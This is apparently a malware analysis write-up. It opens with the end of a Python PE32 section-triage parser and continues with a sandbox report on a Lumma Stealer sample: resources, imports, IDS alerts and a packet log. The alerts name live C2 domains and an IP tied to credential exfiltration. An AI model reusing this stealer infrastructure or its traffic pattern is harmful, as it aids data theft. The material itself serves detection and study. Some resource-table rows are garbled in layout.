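        if s["vsize"] > slack * max(s["rawsize"], 1):          # zero-filled slack at load time
            out.append((s["name"], "vsize-slack",
                        f"VirtualSize {s['vsize']:#x} vs raw {s['rawsize']:#x}"))
        if exe and wrt:
            out.append((s["name"], "rwx", "writable and executable"))
    return out


def _noise(n: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for packed code."""
    out, h = bytearray(), hashlib.sha256(b"constructed").digest()
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed PE32: header fields and section geometry as reported, synthetic contents."""
    specs = [  # name, RVA, VirtualSize, raw bytes (file-aligned), Characteristics
        (b".text", 0x1000, 0x41710, _noise(0x41800), 0x60000020),
        (b".rdata", 0x43000, 0x2444, b"\0" * 0x2600, 0x40000040),
        (b".data", 0x46000, 0x6c8e0, b"\0" * 0x2B00 + b"\xff" * 0x2B00, 0xC0000040),
        (b".rsrc", 0xb3000, 0x18208, bytes(range(256)) * 0x184, 0x40000040),
    ]
    size_of_headers = 0x400
    opt = bytearray(224)                                       # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, 0x1926)                    # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)  # ImageBase, SectionAlign, FileAlign
    struct.pack_into("<HH", opt, 40, 5, 0)                     # OS version 5.0
    struct.pack_into("<HH", opt, 48, 5, 0)                     # subsystem version 5.0
    struct.pack_into("<II", opt, 56, 0xCC000, size_of_headers)  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<HH", opt, 68, 2, 0x0100 | 0x8000)       # GUI; NX_COMPAT | TERMINAL_SERVER_AWARE
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    # RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE, timestamp as reported
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0x6609CEBF, 0, 0, len(opt), 0x0103)
    hdr = bytearray(b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt)
    body, ptr = bytearray(), size_of_headers
    for name, va, vsize, data, flags in specs:
        hdr += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(data), ptr, 0, 0, 0, 0, flags)
        body += data
        ptr += len(data)
    hdr += b"\0" * (size_of_headers - len(hdr))
    return bytes(hdr + body)


if __name__ == "__main__":
    pe = parse_pe32(build_sample_pe())
    for s in pe["sections"]:
        print(f"{s['name']:<7} va={s['va']:#08x} vsize={s['vsize']:#08x} "
              f"raw={s['rawsize']:#08x} entropy={s['entropy']:.3f} md5={s['md5']}")
    for sec, tag, detail in triage(pe):
        print(f"[{tag}] {sec}: {detail}")
```

Run it directly to print the per-section summary and the findings; `parse_pe32` accepts any PE32 bytes, so a real file is handled with `parse_pe32(open(path, "rb").read())`. A section's on-disk entropy says nothing about what it holds once the process runs: the report's "changes PE section rights" and "overwrites its own PE header" signatures come from watching memory after start-up, which no static parser can reproduce.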
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb3810 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.27078891257995735
RT_ICON | 0xb3810 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.27078891257995735
RT_ICON | 0xb46b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.4120036101083033
RT_ICON | 0xb46b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.4120036101083033
RT_ICON | 0xb4f60 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.532258064516129
RT_ICON | 0xb4f60 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.532258064516129
RT_ICON | 0xb5628 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.5744219653179191
RT_ICON | 0xb5628 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.5744219653179191
RT_ICON | 0xb5b90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.4224066390041494
RT_ICON | 0xb5b90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.4224066390041494
RT_ICON | 0xb8138 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.4971311475409836
RT_ICON | 0xb8138 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.4971311475409836
RT_ICON | 0xb8ac0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.499113475177305
RT_ICON | 0xb8ac0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.499113475177305
RT_ICON | 0xb8f90 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.3355543710021322
RT_ICON | 0xb8f90 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.3355543710021322
RT_ICON | 0xb9e38 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.4002707581227437
RT_ICON | 0xb9e38 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.4002707581227437
RT_ICON | 0xba6e0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.39631336405529954
RT_ICON | 0xba6e0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.39631336405529954
RT_ICON | 0xbada8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.398121387283237
RT_ICON | 0xbada8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.398121387283237
RT_ICON | 0xbb310 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.22157676348547717
RT_ICON | 0xbb310 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.22157676348547717
RT_ICON | 0xbd8b8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.24859287054409004
RT_ICON | 0xbd8b8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.24859287054409004
RT_ICON | 0xbe960 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.27909836065573773
RT_ICON | 0xbe960 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.27909836065573773
RT_ICON | 0xbf2e8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.3147163120567376
RT_ICON | 0xbf2e8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.3147163120567376
RT_ICON | 0xbf7c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.30223880597014924
RT_ICON | 0xbf7c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.30223880597014924
RT_ICON | 0xc0670 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.40478339350180503
RT_ICON | 0xc0670 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.40478339350180503
RT_ICON | 0xc0f18 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.44642857142857145
RT_ICON | 0xc0f18 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.44642857142857145
RT_ICON | 0xc15e0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.4407514450867052
RT_ICON | 0xc15e0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.4407514450867052
RT_ICON | 0xc1b48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.24601313320825516
RT_ICON | 0xc1b48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.24601313320825516
RT_ICON | 0xc2bf0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.25
RT_ICON | 0xc2bf0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.25
RT_ICON | 0xc3578 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3147163120567376
RT_ICON | 0xc3578 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3147163120567376
RT_ICON | 0xc3a48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.2747867803837953
RT_ICON | 0xc3a48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.2747867803837953
RT_ICON | 0xc48f0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.3677797833935018
RT_ICON | 0xc48f0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.3677797833935018
RT_ICON | 0xc5198 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.37672811059907835
RT_ICON | 0xc5198 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.37672811059907835
RT_ICON | 0xc5860 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.37283236994219654
RT_ICON | 0xc5860 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.37283236994219654
                                                                                                  RT_ICON0xc5dc80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.25881742738589214
                                                                                                  RT_ICON0xc5dc80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.25881742738589214
                                                                                                  RT_ICON0xc83700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.275562851782364
                                                                                                  RT_ICON0xc83700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.275562851782364
                                                                                                  RT_ICON0xc94180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.2881147540983607
                                                                                                  RT_ICON0xc94180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.2881147540983607
                                                                                                  RT_ICON0xc9da00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.32180851063829785
                                                                                                  RT_ICON0xc9da00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.32180851063829785
                                                                                                  RT_STRING0xca4480x58data0.6590909090909091
                                                                                                  RT_STRING0xca4a00x57edata0.4423897581792319
                                                                                                  RT_STRING0xcaa200x726data0.4191256830601093
                                                                                                  RT_STRING0xcb1480xc0data0.5885416666666666
                                                                                                  RT_ACCELERATOR0xca2800x10data1.5
                                                                                                  RT_GROUP_ICON0xb8f280x68dataTamilIndia0.7115384615384616
                                                                                                  RT_GROUP_ICON0xb8f280x68dataTamilSri Lanka0.7115384615384616
                                                                                                  RT_GROUP_ICON0xca2080x76dataTamilIndia0.6779661016949152
                                                                                                  RT_GROUP_ICON0xca2080x76dataTamilSri Lanka0.6779661016949152
                                                                                                  RT_GROUP_ICON0xbf7500x76dataTamilIndia0.6779661016949152
                                                                                                  RT_GROUP_ICON0xbf7500x76dataTamilSri Lanka0.6779661016949152
                                                                                                  RT_GROUP_ICON0xc39e00x68dataTamilIndia0.7211538461538461
                                                                                                  RT_GROUP_ICON0xc39e00x68dataTamilSri Lanka0.7211538461538461
                                                                                                  RT_VERSION0xca2900x1b4data0.5665137614678899
DLL | Import
KERNEL32.dll | SearchPathW, OpenFile, GetConsoleAliasesLengthW, TlsGetValue, DebugActiveProcessStop, GetDefaultCommConfigW, CreateProcessW, InterlockedIncrement, MoveFileExW, GetEnvironmentStringsW, InterlockedCompareExchange, GetTimeFormatA, CallNamedPipeW, FreeEnvironmentStringsA, GetModuleHandleW, GetDateFormatA, EnumTimeFormatsW, GetVolumePathNameW, GetEnvironmentStrings, SetVolumeLabelA, GetAtomNameW, DeactivateActCtx, GetStartupInfoA, SetLastError, GetLongPathNameA, SetComputerNameA, BuildCommDCBW, GetAtomNameA, LocalAlloc, MoveFileA, SetConsoleDisplayMode, AddAtomW, VirtualProtect, Module32Next, FileTimeToLocalFileTime, DeleteTimerQueueTimer, OpenFileMappingA, GetProfileSectionW, LoadLibraryW, GetCommandLineW, GetLastError, HeapFree, HeapReAlloc, HeapAlloc, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, WriteFile, GetStdHandle, GetModuleFileNameA, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
GDI32.dll | GetBitmapBits
Language of compilation system | Country where language is spoken | Map
Tamil | India
Tamil | Sri Lanka


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-26T15:47:59.155701+0100 | 2059421 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) | 1 | 192.168.2.7 | 53091 | 1.1.1.1 | 53 | UDP
2025-01-26T15:47:59.169214+0100 | 2059423 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) | 1 | 192.168.2.7 | 58904 | 1.1.1.1 | 53 | UDP
2025-01-26T15:47:59.794618+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49700 | 172.67.149.66 | 443 | TCP
2025-01-26T15:47:59.794618+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:00.859158+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49700 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:00.859158+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49700 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:01.349618+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49701 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:01.349618+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:01.865980+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49701 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:01.865980+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49701 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:02.600271+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49702 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:02.600271+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49702 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:03.207759+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49702 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:03.829022+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49703 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:03.829022+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49703 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:05.459225+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49705 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:05.459225+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49705 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:06.974006+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49711 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:06.974006+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49711 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:08.667496+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49722 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:08.667496+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49722 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:11.847642+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49746 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:11.847642+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49746 | 172.67.149.66 | 443 | TCP
2025-01-26T15:48:12.337047+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49746 | 172.67.149.66 | 443 | TCP
• Total Packets: 103
• 443 (HTTPS)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 26, 2025 15:47:59.186034918 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:47:59.186085939 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:47:59.186151028 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:47:59.189582109 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:47:59.189614058 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:47:59.794538975 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:47:59.794617891 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:47:59.798407078 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:47:59.798420906 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:47:59.798768997 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:47:59.843177080 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.113369942 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.113416910 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.113578081 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:00.859188080 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:00.859296083 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:00.859365940 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.861236095 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.861254930 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:00.861270905 CET | 49700 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.861278057 CET | 443 | 49700 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:00.871609926 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.871659994 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:00.871737003 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.872083902 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:00.872097015 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.349514008 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.349617958 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.352233887 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.352248907 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.352539062 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.354674101 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.354707003 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.354751110 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.865986109 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.866034985 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.866061926 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.866097927 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.866107941 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.866137981 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.866156101 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.866198063 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.866239071 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.866250038 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.866596937 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.866637945 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.866643906 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.870748043 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.870774984 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.870798111 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.870804071 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.870806932 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.870852947 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.921333075 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.955650091 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.955838919 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.955892086 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.955913067 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.956074953 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.956147909 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.956233978 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.956248999 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:01.956260920 CET | 49701 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:01.956265926 CET | 443 | 49701 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:02.126146078 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:02.126190901 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:02.126274109 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:02.126719952 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:02.126735926 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:02.599946976 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:02.600270987 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:02.601408005 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:02.601418972 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:02.601671934 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:02.606173992 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:02.606390953 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:02.606421947 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.207815886 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.208060026 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.208170891 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.224893093 CET | 49702 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.224917889 CET | 443 | 49702 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.336381912 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.336441994 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.336539984 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.336961031 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.336971998 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.828830957 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.829021931 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.831636906 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.831669092 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.832969904 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.834475040 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.834652901 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.834744930 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:03.834820032 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:03.834836006 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:04.707654953 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:04.707926035 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:04.709203005 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
